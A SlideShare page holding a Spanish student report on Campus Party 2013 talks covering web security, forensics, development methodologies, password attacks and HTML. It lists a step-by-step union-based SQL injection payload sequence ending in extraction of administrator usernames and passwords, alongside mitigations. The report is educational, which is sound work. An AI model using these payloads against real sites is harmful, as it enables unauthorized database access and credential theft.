SlideShare una empresa de Scribd logo
1 de 8
UNIVERSIDAD NACIONAL DE CHIMBORAZO
FACULTAD DE INGENIERIA
ESCUELA DE SISTEMAS

SISTEMAS DE INFORMACION GEOGRAFICA

Docente: Ing. Gonzalo Allauca

Nombre: Mónica Morocho

Curso: Quinto Año

Riobamba 23 de septiembre del 2013
INTRODUCCION
Las diferentes conferencias fueron presentadas para fortalecer los conocimientos
tecnológicos.
Las Conferencias tienen también como objetivo destacar la importancia de la educación en
distintos niveles para la toma de conciencia acerca del papel fundamental que implica en
nuestra vida cotidiana del hombre y representan una oportunidad para documentar buenas
prácticas de educación sobre los sistemas informáticos, compartir e intercambiar experiencias
y formular recomendaciones sobre los distintos temas.
OBJETIVOS
GENERAL.
Diseñar cursos virtuales como asistencia a las asignaturas dictadas en la carrera de
Ingeniería de Sistemas.
ESPECIFICOS.
Conocer la importancia sobre los distintos temas:
 Seguridades web para desarrolladores.
 Análisis forense.
 Metodología de desarrollo de Sistemas de información.
 Ataques que vulneran las contraseñas.
 HTML.
Analizar el comportamiento estudiantil en las asignaturas pertenecientes a la carrera
de Ingeniería de Sistemas.
Seleccionar la herramienta adecuada para una correcta seguridad el ámbito
informático.
SEGURIDAD WEB PARA DESARROLLADORES.
La seguridad web no es una característica, son acciones.
El problema en la seguridad web está en constante crecimiento.
La seguridad debe ser considerada todo el tiempo de desarrollo es decir debe estar
durante todas las etapas.
Sqlinjection
Es un método de infiltración de código intruso que se vale de una vulnerabilidad informática
presente en una aplicación en el nivel de validación de las entradas para realizar consultas a
una base de datos.
Pasos
1. Valores tipo
?id=3 agregar.
2. Numero de columna
“ ?id=2+orden+by+1”
3. Columna vulnerable
“ -1+unión+select+1,2,3”
4. Version Myslq
“ -1+union+select+1,2,@@version,4,5”
5. Nombre base
“-1+union+select+1,2,group_concat(schema_name) + informatio_schema.schema”.
6. Nombres de tablas
“id=1+union+select+1,2,group_concat(table_name),4,5++from+information_schema.t
ables+where+table_schema=database()”
7. Final nombre de usuario
8. “id=1+union+select+1,2,group_concat(id,user_name,user_password),4,5+from+admini
strators”
Soluciones
Validar datos antes de usarlos en el SQL dinámico
Usar PDO
Usar mínimo mysql_real_escape_string.
El uso de addslashes() no es suficiente.
Cross-site Scripting (XSS)
XSS es un ataque de inyección de código malicioso para su posterior ejecución que puede
realizarse a sitios web, aplicaciones locales e incluso al navegador.
Soluciones
No confiar enlos datos que se obtienen
Saneando los datos.
Escapando los datos htmlspecialchars
Validaciones de datos de entradas
ANALISIS FORENSE.

Computo Forense
El cómputo forense, también llamado informática forense, computación forense, análisis
forense digital o examinación forense digital es la aplicación de técnicas científicas y analíticas
especializadas a infraestructura tecnológica que permiten identificar, preservar, analizar y
presentar datos que sean válidos dentro de un proceso legal.
Dichas técnicas incluyen reconstruir el bien informático, examinar datos residuales, autenticar
datos y explicar las características técnicas del uso aplicado a los datos y bienes informáticos
El análisis forense informático es una prueba clave en numerosas ocasiones, como por
ejemplo:
Revelación de secretos, espionaje industrial y confidencialidad
Delitos económicos, societarios o contra el mercado o los consumidores
Delitos contra la propiedad intelectual e industrial
Vulneración de la intimidad
Sabotaje
Uso indebido de equipos
Amenazas, calumnias e injurias
Cumplimiento de obligaciones y contratos
Pasos principales
La identificación
Es muy importante conocer los antecedentes.
Preservación.
Este paso incluye la revisión y generación de las imágenes forenses de la evidencia
Análisis.
Proceso de aplicar técnicas científicas y analíticas a los medios duplicados por medio
del proceso forense para poder encontrar pruebas de ciertas conductas.
Presentación.
Es el recopilar toda la información que se obtuvo a partir del análisis para realizar el
reporte y la presentación a los abogados.
METODOLOGÍA DE DESARROLLO DE SISTEMAS DE INFORMACIÓN
Metodología
Ciencia del método.Conjunto de métodos que se siguen en una investigación científica o en
una exposición doctrinal.
Métodos del desarrollo de sistemas de información
1.
2.
3.
4.
5.
6.

Especificación de requerimientos
Análisis.
Diseño.
Programación.
Pruebas
Implementación.
Objetivos
Asegurar la uniformidad y calidad tanto del desarrollo como del sistema.
Satisfacer las necesidades de los usuarios del sistema.
Conseguir un mayor nivel de rendimiento y eficiencia del personal asignado al
desarrollo.
Ajuste a los plazos y costos previstos en la planificación.
Generar de forma adecuada la documentación asociada a los sistemas.
Facilitar el mantenimiento posterior de los sistemas.
Cascada pura.
Beneficios.
Secuencia ordenada de métodos.
Está dirigido por documentos.
Detección temprana de errores.
Reduce costos de planificación.
Permite a la organización a generar capital humano.
Desventajas.
Avance lento del proyecto.
Resultados palpables solo al final del proyecto.
Exceso de documentación útil.
Volátil en tiempos de entrega.
Costos altos en inversión tecnología.
Pruebay error.
Poco útil, bastante común.
No requiere definición formal.
Es intuitiva.
De rápido acceso a puesta en producción.
Es eficiente para pequeños proyectos.
No genera documentación.
Excede en confianza.
Método prototipo
Requiere de un usuario experto.
Genera un sistema que funciona.
El requerimiento de información no está bien definido.
Genera un sistema piloto de pruebas.
Garantiza funcionalidad pero no desempeño.

Modelo en espiral
Es un modelo de proceso de software evolutivo, enlaza prototipos y cascada.
Genera un crecimiento incremental de grado de definición e implementación.
Precisa puntos de retorno.
Provoca toma de decisiones más certeras.
Útil para grandes desarrollos.
Scrum
Metodología ágil y flexible.
Muy alto involucramiento del usuario.
Reuniones programadas diarias.
Construye primero la funcionalidad de mayor valor para el cliente.
Entregas parciales funcionales.
Genera capital humano interno a la organización.
ATAQUES QU VULNERAN LA CONTRASEÑA.
Que alguien la adivine
Si tu contraseña es muy obvia, puede resultar fácil para el vecino que quiere colgarse a tu WiFi
adivinar que la contraseña es el número de departamento, o tu apellido, o algo así.
Ataques de fuerza bruta
Un ataque bastante común, donde un hacker intenta apuntarle por la fuerza a la contraseña
intentando todas las combinaciones posibles de letras (aaaa, aaab, aaac...) hasta llegar a la
tuya. La única manera de volverse resistente a esto es con contraseñas más largas y complejas,
que hacen que el proceso se demore más de lo que el hacker está dispuesto a esperar.
Ataque de palabras comunes
En lugar de usar combinaciones de letras, se usan combinaciones de palabras que existen,
como árbol, casa, sol, etc.
Ataque diccionario
En lugar de sólo usar palabras comunes, se usa un diccionario de contraseñas comunes (hay
múltiples bases de datos de esto que crecen con cada hackeo).
Métodos de Autenticación.
Algo que se.
Algo que tengo.
Algo que soy.
Construyendo una contraseña fuerte
Usa un mínimo de 8 caracteres.
No repetir las letras y si lo haces procura que alguna esté en mayúscula.
Utilizar todo tipo de caracteres especiales y signos de puntuación.
No usar información personal en la elaboración de estas (nombre de tu mascota o
fecha de cumpleaños).
HTML
Es un estándar que, en sus diferentes versiones, define una estructura básica y un código
(denominado código HTML) para la definición de contenido de una página web, como texto,
imágenes, etc.
El HTML se escribe en forma de «etiquetas», rodeadas por corchetes angulares (<,>). HTML
también puede describir, hasta un cierto punto, la apariencia de un documento, y puede
incluir o hacer referencia a un tipo de programa llamado script, el cual puede afectar el
comportamiento de navegadores web y otros procesadores de HTML.
Para crear una página web se pueden utilizar varios programas especializadosEstructura de los
documentos de HTML.
Un documento escrito en HTML contiene las siguientes etiquetas en el siguiente orden:
<HTML>
<HEAD>
<TITLE> Título de mi página de Internet </TITLE>
</HEAD>
<BODY>
<H1><CENTER>Primerapagina</CENTER></H1>
<HR>
CONCLUSIONES
Es importante resaltar el aporte educativo a nivel tecnológico que fue presentada en cada una
de las conferencias, además se debe considerar los diferentes tipos de avances a nivel
tecnológico e informático para de este modo poder tener soluciones a problemas generados
por los mismos.

RECOMENDACIONES
Incentivar a la institución este tipo de eventos para mejorar la calidad educativa de la misma.
BIBLIOGRAFIA.
Video conferencias.

Más contenido relacionado

Destacado

The FOCUS Project
The FOCUS ProjectThe FOCUS Project
The FOCUS ProjectSam Nolan
 
Ieeepro techno solutions 2012 ieee embedded project - microelectromechanic...
Ieeepro techno solutions   2012 ieee embedded project  - microelectromechanic...Ieeepro techno solutions   2012 ieee embedded project  - microelectromechanic...
Ieeepro techno solutions 2012 ieee embedded project - microelectromechanic...srinivasanece7
 
La edad legal de jubilación y su importancia
La edad legal de jubilación y su importanciaLa edad legal de jubilación y su importancia
La edad legal de jubilación y su importanciaInstitutoBBVAdePensiones
 
Standard Industrial Process_Avinash Kumar Singh
Standard Industrial Process_Avinash Kumar SinghStandard Industrial Process_Avinash Kumar Singh
Standard Industrial Process_Avinash Kumar SinghAvinash Kumar Singh
 
Accidentes domesticos
Accidentes domesticosAccidentes domesticos
Accidentes domesticosJair Orozco
 
uihusdhoivhcivjidsjvidjvidjvidjvjcñix
uihusdhoivhcivjidsjvidjvidjvidjvjcñixuihusdhoivhcivjidsjvidjvidjvidjvjcñix
uihusdhoivhcivjidsjvidjvidjvidjvjcñixjuancarlos2222
 
Presentation king
Presentation kingPresentation king
Presentation kingdiaradaisy
 
Software educativo valeria
Software educativo valeriaSoftware educativo valeria
Software educativo valeriaValeria Olivares
 
La pensión en el primer año de la jubilación
La pensión en el primer año de la jubilaciónLa pensión en el primer año de la jubilación
La pensión en el primer año de la jubilaciónInstitutoBBVAdePensiones
 

Destacado (13)

Futurismus
FuturismusFuturismus
Futurismus
 
The FOCUS Project
The FOCUS ProjectThe FOCUS Project
The FOCUS Project
 
Ieeepro techno solutions 2012 ieee embedded project - microelectromechanic...
Ieeepro techno solutions   2012 ieee embedded project  - microelectromechanic...Ieeepro techno solutions   2012 ieee embedded project  - microelectromechanic...
Ieeepro techno solutions 2012 ieee embedded project - microelectromechanic...
 
TAIWO IBITOYE
TAIWO IBITOYETAIWO IBITOYE
TAIWO IBITOYE
 
La edad legal de jubilación y su importancia
La edad legal de jubilación y su importanciaLa edad legal de jubilación y su importancia
La edad legal de jubilación y su importancia
 
Standard Industrial Process_Avinash Kumar Singh
Standard Industrial Process_Avinash Kumar SinghStandard Industrial Process_Avinash Kumar Singh
Standard Industrial Process_Avinash Kumar Singh
 
US Embassy Tbilisi
US Embassy TbilisiUS Embassy Tbilisi
US Embassy Tbilisi
 
Accidentes domesticos
Accidentes domesticosAccidentes domesticos
Accidentes domesticos
 
sotware educativo
sotware educativosotware educativo
sotware educativo
 
uihusdhoivhcivjidsjvidjvidjvidjvjcñix
uihusdhoivhcivjidsjvidjvidjvidjvjcñixuihusdhoivhcivjidsjvidjvidjvidjvjcñix
uihusdhoivhcivjidsjvidjvidjvidjvjcñix
 
Presentation king
Presentation kingPresentation king
Presentation king
 
Software educativo valeria
Software educativo valeriaSoftware educativo valeria
Software educativo valeria
 
La pensión en el primer año de la jubilación
La pensión en el primer año de la jubilaciónLa pensión en el primer año de la jubilación
La pensión en el primer año de la jubilación
 

Similar a Informe Campus Party 2013

Informe de los temas del campus party
Informe de los temas del campus partyInforme de los temas del campus party
Informe de los temas del campus partyDaniel Minchala
 
Informe Campus Party 2013
Informe Campus Party 2013Informe Campus Party 2013
Informe Campus Party 2013JannethGS
 
Securiza tu red con Snort y sus amigos
Securiza tu red con Snort y sus amigosSecuriza tu red con Snort y sus amigos
Securiza tu red con Snort y sus amigosspankito
 
Ciclo de Vida y Diseño de Sistemas de Informacion
Ciclo de Vida y Diseño de Sistemas de InformacionCiclo de Vida y Diseño de Sistemas de Informacion
Ciclo de Vida y Diseño de Sistemas de InformacionJonathanCarrillo46
 
Analisis de requerimientos
Analisis de requerimientosAnalisis de requerimientos
Analisis de requerimientosssalzar
 
Respuestas de analisis de sistema
Respuestas de analisis de sistemaRespuestas de analisis de sistema
Respuestas de analisis de sistemaMurcie Lago
 
Curso análisis y diseño de sistemas
Curso análisis y diseño de sistemasCurso análisis y diseño de sistemas
Curso análisis y diseño de sistemasAlejandro Caro
 
Jessika parica. Fundamentos y métodos de análisis de los requerimientos.
Jessika parica. Fundamentos y métodos de análisis de los requerimientos.Jessika parica. Fundamentos y métodos de análisis de los requerimientos.
Jessika parica. Fundamentos y métodos de análisis de los requerimientos.Jessika Parica
 

Similar a Informe Campus Party 2013 (20)

Informe Campus Party 2013
Informe Campus Party 2013Informe Campus Party 2013
Informe Campus Party 2013
 
Informe de los temas del campus party
Informe de los temas del campus partyInforme de los temas del campus party
Informe de los temas del campus party
 
Informe Campus Party 2013
Informe Campus Party 2013Informe Campus Party 2013
Informe Campus Party 2013
 
Securiza tu red con Snort y sus amigos
Securiza tu red con Snort y sus amigosSecuriza tu red con Snort y sus amigos
Securiza tu red con Snort y sus amigos
 
Tecnicas
TecnicasTecnicas
Tecnicas
 
Guia examen adsi
Guia examen adsiGuia examen adsi
Guia examen adsi
 
Métodos vulnerabilidad activos
Métodos vulnerabilidad activosMétodos vulnerabilidad activos
Métodos vulnerabilidad activos
 
Campus party 2013
Campus party 2013Campus party 2013
Campus party 2013
 
Ciclo de Vida y Diseño de Sistemas de Informacion
Ciclo de Vida y Diseño de Sistemas de InformacionCiclo de Vida y Diseño de Sistemas de Informacion
Ciclo de Vida y Diseño de Sistemas de Informacion
 
DISEÑO DE SISTEMAS.pptx
DISEÑO DE SISTEMAS.pptxDISEÑO DE SISTEMAS.pptx
DISEÑO DE SISTEMAS.pptx
 
Ensayo sobre la calidad de software
Ensayo sobre la calidad de softwareEnsayo sobre la calidad de software
Ensayo sobre la calidad de software
 
Ensayo sobre la calidad de software
Ensayo sobre la calidad de softwareEnsayo sobre la calidad de software
Ensayo sobre la calidad de software
 
Ensayo sobre la calidad de software
Ensayo sobre la calidad de softwareEnsayo sobre la calidad de software
Ensayo sobre la calidad de software
 
Ciclo de vida SI
Ciclo de vida SICiclo de vida SI
Ciclo de vida SI
 
2012temariohackingv9
2012temariohackingv92012temariohackingv9
2012temariohackingv9
 
Analisis de requerimientos
Analisis de requerimientosAnalisis de requerimientos
Analisis de requerimientos
 
Respuestas de analisis de sistema
Respuestas de analisis de sistemaRespuestas de analisis de sistema
Respuestas de analisis de sistema
 
Curso análisis y diseño de sistemas
Curso análisis y diseño de sistemasCurso análisis y diseño de sistemas
Curso análisis y diseño de sistemas
 
Temario de Taller de DB
Temario de Taller de DBTemario de Taller de DB
Temario de Taller de DB
 
Jessika parica. Fundamentos y métodos de análisis de los requerimientos.
Jessika parica. Fundamentos y métodos de análisis de los requerimientos.Jessika parica. Fundamentos y métodos de análisis de los requerimientos.
Jessika parica. Fundamentos y métodos de análisis de los requerimientos.
 

Más de Carolina Remache (18)

Unidad 1
Unidad 1Unidad 1
Unidad 1
 
Informe Práctica 4
Informe Práctica 4Informe Práctica 4
Informe Práctica 4
 
Cuestionario Unidad 1
Cuestionario Unidad 1Cuestionario Unidad 1
Cuestionario Unidad 1
 
Informe Práctica 1
Informe Práctica 1 Informe Práctica 1
Informe Práctica 1
 
Software GIS
Software GISSoftware GIS
Software GIS
 
Hardware GIS
Hardware GISHardware GIS
Hardware GIS
 
Inventario características HW PC - ARCGIS 10
Inventario características HW PC - ARCGIS 10Inventario características HW PC - ARCGIS 10
Inventario características HW PC - ARCGIS 10
 
GIS Preguntas y respuestas
GIS Preguntas y respuestasGIS Preguntas y respuestas
GIS Preguntas y respuestas
 
Definición de GIS
Definición de GISDefinición de GIS
Definición de GIS
 
Introducción de GIS
Introducción de GISIntroducción de GIS
Introducción de GIS
 
Unidad 1
Unidad 1   Unidad 1
Unidad 1
 
Práctica N° 4
Práctica N° 4Práctica N° 4
Práctica N° 4
 
Cuestionario Unidad 1
Cuestionario Unidad 1Cuestionario Unidad 1
Cuestionario Unidad 1
 
Práctica N° 1
Práctica N° 1Práctica N° 1
Práctica N° 1
 
Software para GIS
Software para GISSoftware para GIS
Software para GIS
 
Hardware para GIS
Hardware para GISHardware para GIS
Hardware para GIS
 
Preguntas y Respuestas de GIS
Preguntas y Respuestas de GISPreguntas y Respuestas de GIS
Preguntas y Respuestas de GIS
 
Definición de GIS
Definición de GISDefinición de GIS
Definición de GIS
 

Último

Infografía EE con pie del 2023 (3)-1.pdf
Infografía EE con pie del 2023 (3)-1.pdfInfografía EE con pie del 2023 (3)-1.pdf
Infografía EE con pie del 2023 (3)-1.pdfAlfaresbilingual
 
Cuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfCuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfNancyLoaa
 
5.- Doerr-Mide-lo-que-importa-DESARROLLO PERSONAL
5.- Doerr-Mide-lo-que-importa-DESARROLLO PERSONAL5.- Doerr-Mide-lo-que-importa-DESARROLLO PERSONAL
5.- Doerr-Mide-lo-que-importa-DESARROLLO PERSONALMiNeyi1
 
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.doc
SESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.docSESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.doc
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.docRodneyFrankCUADROSMI
 
2024 KIT DE HABILIDADES SOCIOEMOCIONALES.pdf
2024 KIT DE HABILIDADES SOCIOEMOCIONALES.pdf2024 KIT DE HABILIDADES SOCIOEMOCIONALES.pdf
2024 KIT DE HABILIDADES SOCIOEMOCIONALES.pdfMiguelHuaman31
 
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docxEliaHernndez7
 
6.-Como-Atraer-El-Amor-01-Lain-Garcia-Calvo.pdf
6.-Como-Atraer-El-Amor-01-Lain-Garcia-Calvo.pdf6.-Como-Atraer-El-Amor-01-Lain-Garcia-Calvo.pdf
6.-Como-Atraer-El-Amor-01-Lain-Garcia-Calvo.pdfMiNeyi1
 
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática5    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática5    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdfDemetrio Ccesa Rayme
 
PLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxPLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxlupitavic
 
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptxLA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptxlclcarmen
 
2 REGLAMENTO RM 0912-2024 DE MODALIDADES DE GRADUACIÓN_.pptx
2 REGLAMENTO RM 0912-2024 DE MODALIDADES DE GRADUACIÓN_.pptx2 REGLAMENTO RM 0912-2024 DE MODALIDADES DE GRADUACIÓN_.pptx
2 REGLAMENTO RM 0912-2024 DE MODALIDADES DE GRADUACIÓN_.pptxRigoTito
 
Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Lourdes Feria
 
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...JAVIER SOLIS NOYOLA
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAEl Fortí
 
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdfFeliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdfMercedes Gonzalez
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICAÁngel Encinas
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAJAVIER SOLIS NOYOLA
 

Último (20)

Infografía EE con pie del 2023 (3)-1.pdf
Infografía EE con pie del 2023 (3)-1.pdfInfografía EE con pie del 2023 (3)-1.pdf
Infografía EE con pie del 2023 (3)-1.pdf
 
Cuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdfCuaderno de trabajo Matemática 3 tercer grado.pdf
Cuaderno de trabajo Matemática 3 tercer grado.pdf
 
5.- Doerr-Mide-lo-que-importa-DESARROLLO PERSONAL
5.- Doerr-Mide-lo-que-importa-DESARROLLO PERSONAL5.- Doerr-Mide-lo-que-importa-DESARROLLO PERSONAL
5.- Doerr-Mide-lo-que-importa-DESARROLLO PERSONAL
 
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.doc
SESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.docSESION DE PERSONAL SOCIAL.  La convivencia en familia 22-04-24  -.doc
SESION DE PERSONAL SOCIAL. La convivencia en familia 22-04-24 -.doc
 
2024 KIT DE HABILIDADES SOCIOEMOCIONALES.pdf
2024 KIT DE HABILIDADES SOCIOEMOCIONALES.pdf2024 KIT DE HABILIDADES SOCIOEMOCIONALES.pdf
2024 KIT DE HABILIDADES SOCIOEMOCIONALES.pdf
 
Supuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docxSupuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docx
 
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
 
6.-Como-Atraer-El-Amor-01-Lain-Garcia-Calvo.pdf
6.-Como-Atraer-El-Amor-01-Lain-Garcia-Calvo.pdf6.-Como-Atraer-El-Amor-01-Lain-Garcia-Calvo.pdf
6.-Como-Atraer-El-Amor-01-Lain-Garcia-Calvo.pdf
 
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
Programacion Anual Matemática5    MPG 2024  Ccesa007.pdfProgramacion Anual Matemática5    MPG 2024  Ccesa007.pdf
Programacion Anual Matemática5 MPG 2024 Ccesa007.pdf
 
PLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docxPLAN DE REFUERZO ESCOLAR primaria (1).docx
PLAN DE REFUERZO ESCOLAR primaria (1).docx
 
Medición del Movimiento Online 2024.pptx
Medición del Movimiento Online 2024.pptxMedición del Movimiento Online 2024.pptx
Medición del Movimiento Online 2024.pptx
 
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptxLA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
 
2 REGLAMENTO RM 0912-2024 DE MODALIDADES DE GRADUACIÓN_.pptx
2 REGLAMENTO RM 0912-2024 DE MODALIDADES DE GRADUACIÓN_.pptx2 REGLAMENTO RM 0912-2024 DE MODALIDADES DE GRADUACIÓN_.pptx
2 REGLAMENTO RM 0912-2024 DE MODALIDADES DE GRADUACIÓN_.pptx
 
Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...Caja de herramientas de inteligencia artificial para la academia y la investi...
Caja de herramientas de inteligencia artificial para la academia y la investi...
 
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
LABERINTOS DE DISCIPLINAS DEL PENTATLÓN OLÍMPICO MODERNO. Por JAVIER SOLIS NO...
 
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURAFORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
FORTI-MAYO 2024.pdf.CIENCIA,EDUCACION,CULTURA
 
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdfFeliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
 
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICABIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
BIOMETANO SÍ, PERO NO ASÍ. LA NUEVA BURBUJA ENERGÉTICA
 
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLAACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
ACERTIJO DE POSICIÓN DE CORREDORES EN LA OLIMPIADA. Por JAVIER SOLIS NOYOLA
 
Presentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza MultigradoPresentacion Metodología de Enseñanza Multigrado
Presentacion Metodología de Enseñanza Multigrado
 

Informe Campus Party 2013

  • 1. UNIVERSIDAD NACIONAL DE CHIMBORAZO FACULTAD DE INGENIERIA ESCUELA DE SISTEMAS SISTEMAS DE INFORMACION GEOGRAFICA Docente: Ing. Gonzalo Allauca Nombre: Mónica Morocho Curso: Quinto Año Riobamba 23 de septiembre del 2013
  • 2. INTRODUCCION Las diferentes conferencias fueron presentadas para fortalecer los conocimientos tecnológicos. Las Conferencias tienen también como objetivo destacar la importancia de la educación en distintos niveles para la toma de conciencia acerca del papel fundamental que implica en nuestra vida cotidiana del hombre y representan una oportunidad para documentar buenas prácticas de educación sobre los sistemas informáticos, compartir e intercambiar experiencias y formular recomendaciones sobre los distintos temas. OBJETIVOS GENERAL. Diseñar cursos virtuales como asistencia a las asignaturas dictadas en la carrera de Ingeniería de Sistemas. ESPECIFICOS. Conocer la importancia sobre los distintos temas:  Seguridades web para desarrolladores.  Análisis forense.  Metodología de desarrollo de Sistemas de información.  Ataques que vulneran las contraseñas.  HTML. Analizar el comportamiento estudiantil en las asignaturas pertenecientes a la carrera de Ingeniería de Sistemas. Seleccionar la herramienta adecuada para una correcta seguridad el ámbito informático.
  • 3. SEGURIDAD WEB PARA DESARROLLADORES. La seguridad web no es una característica, son acciones. El problema en la seguridad web está en constante crecimiento. La seguridad debe ser considerada todo el tiempo de desarrollo es decir debe estar durante todas las etapas. Sqlinjection Es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar consultas a una base de datos. Pasos 1. Valores tipo ?id=3 agregar. 2. Numero de columna “ ?id=2+orden+by+1” 3. Columna vulnerable “ -1+unión+select+1,2,3” 4. Version Myslq “ -1+union+select+1,2,@@version,4,5” 5. Nombre base “-1+union+select+1,2,group_concat(schema_name) + informatio_schema.schema”. 6. Nombres de tablas “id=1+union+select+1,2,group_concat(table_name),4,5++from+information_schema.t ables+where+table_schema=database()” 7. Final nombre de usuario 8. “id=1+union+select+1,2,group_concat(id,user_name,user_password),4,5+from+admini strators” Soluciones Validar datos antes de usarlos en el SQL dinámico Usar PDO Usar mínimo mysql_real_escape_string. El uso de addslashes() no es suficiente. Cross-site Scripting (XSS) XSS es un ataque de inyección de código malicioso para su posterior ejecución que puede realizarse a sitios web, aplicaciones locales e incluso al navegador. Soluciones No confiar enlos datos que se obtienen Saneando los datos. Escapando los datos htmlspecialchars Validaciones de datos de entradas
  • 4. ANALISIS FORENSE. Computo Forense El cómputo forense, también llamado informática forense, computación forense, análisis forense digital o examinación forense digital es la aplicación de técnicas científicas y analíticas especializadas a infraestructura tecnológica que permiten identificar, preservar, analizar y presentar datos que sean válidos dentro de un proceso legal. Dichas técnicas incluyen reconstruir el bien informático, examinar datos residuales, autenticar datos y explicar las características técnicas del uso aplicado a los datos y bienes informáticos El análisis forense informático es una prueba clave en numerosas ocasiones, como por ejemplo: Revelación de secretos, espionaje industrial y confidencialidad Delitos económicos, societarios o contra el mercado o los consumidores Delitos contra la propiedad intelectual e industrial Vulneración de la intimidad Sabotaje Uso indebido de equipos Amenazas, calumnias e injurias Cumplimiento de obligaciones y contratos Pasos principales La identificación Es muy importante conocer los antecedentes. Preservación. Este paso incluye la revisión y generación de las imágenes forenses de la evidencia Análisis. Proceso de aplicar técnicas científicas y analíticas a los medios duplicados por medio del proceso forense para poder 